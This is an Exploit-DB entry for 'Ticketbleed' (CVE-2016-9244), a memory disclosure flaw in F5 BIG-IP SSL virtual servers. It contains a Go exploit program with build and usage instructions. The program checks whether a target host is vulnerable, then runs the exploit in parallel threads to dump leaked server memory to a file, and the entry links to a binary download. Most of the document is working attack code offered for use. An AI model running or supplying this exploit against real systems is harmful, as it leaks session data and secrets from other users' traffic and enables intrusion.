F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure

EDB-ID:

41298

Author:

Ege Balci

Type:

remote

Platform:

Hardware

Published:

2017-02-10

/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]




BUILD:
	go get github.com/EgeBalci/Ticketbleed
	go build Ticketbleed.go

USAGE:
	./ticketbleed <options> <ip:port>
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message

*/
package main

import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"


var OutputFile string = ""
var BleedSize int = 0

func main() {


	ARGS := os.Args[1:]
	if len(ARGS) < 1 || len(ARGS) > 5{
		fmt.Println(Help)
		os.Exit(1)
	}

  	for i := 0; i < len(ARGS); i++{

		if ARGS[i] == "-h" || ARGS[i] == "--help"{
			fmt.Println(Help)
			os.Exit(1)
	  	}

		if ARGS[i] == "-o" || ARGS[i] == "--out"{
			OutputFile = ARGS[i+1]
	  	}

	  	if ARGS[i] == "-s" || ARGS[i] == "--size"{
	  		Size,err := strconv.Atoi(ARGS[i+1])
	  		if err != nil {
	  			fmt.Println("[-] ERROR: Invalid size value !")
	  			os.Exit(1)
	  		}
	  		if Size < 0 {
	  			fmt.Println("[-] ERROR: Size can't be smaller than 0")
	  			os.Exit(1)
	  		}else{
	  			BleedSize = Size
	  		}
	  	}
 	}

	if OutputFile != "" {
		File, FileErr := os.Create(OutputFile)
		if FileErr != nil {
			fmt.Println("[-] ERROR: While creating output file !")
			os.Exit(1)
		}
		File.Close()
		fmt.Println("[*] Output file: "+OutputFile)
	}

 	VulnStatus := Ticketbleed.Check(ARGS[0])								// First check if it's vulnerable
 	fmt.Println(VulnStatus)
 	if strings.Contains(VulnStatus, "[+]") {
 		
 		go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))  		// With using multiple threads it is easyer to move on stack
 		Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))				// Othervise server echoes back alot of duplicate value
 	}

}



var Help string = `
▄▄▄█████▓ ██▓ ▄████▄   ██ ▄█▀▓█████▄▄▄█████▓ ▄▄▄▄    ██▓    ▓█████ ▓█████ ▓█████▄ 
▓  ██▒ ▓▒▓██▒▒██▀ ▀█   ██▄█▒ ▓█   ▀▓  ██▒ ▓▒▓█████▄ ▓██▒    ▓█   ▀ ▓█   ▀ ▒██▀ ██▌
▒ ▓██░ ▒░▒██▒▒▓█    ▄ ▓███▄░ ▒███  ▒ ▓██░ ▒░▒██▒ ▄██▒██░    ▒███   ▒███   ░██   █▌
░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄░ ▓██▓ ░ ▒██░█▀  ▒██░    ▒▓█  ▄ ▒▓█  ▄ ░▓█▄   ▌
  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██▒ █▄░▒████▒ ▒██▒ ░ ░▓█  ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒ ░░   ░▒▓███▀▒░ ▒░▓  ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓  ▒ 
    â–‘     â–’ â–‘  â–‘  â–’   â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘  â–‘   â–‘    â–’â–‘â–’   â–‘ â–‘ â–‘ â–’  â–‘ â–‘ â–‘  â–‘ â–‘ â–‘  â–‘ â–‘ â–’  â–’ 
  â–‘       â–’ â–‘â–‘        â–‘ â–‘â–‘ â–‘    â–‘    â–‘       â–‘    â–‘   â–‘ â–‘      â–‘      â–‘    â–‘ â–‘  â–‘ 
          â–‘  â–‘ â–‘      â–‘  â–‘      â–‘  â–‘         â–‘          â–‘  â–‘   â–‘  â–‘   â–‘  â–‘   â–‘    
             â–‘                                    â–‘                        â–‘      

Author: Ege Balci
Github: github.com/EgeBalci


USAGE: 
	./ticketbleed <ip:port> <options> 
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message
`

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip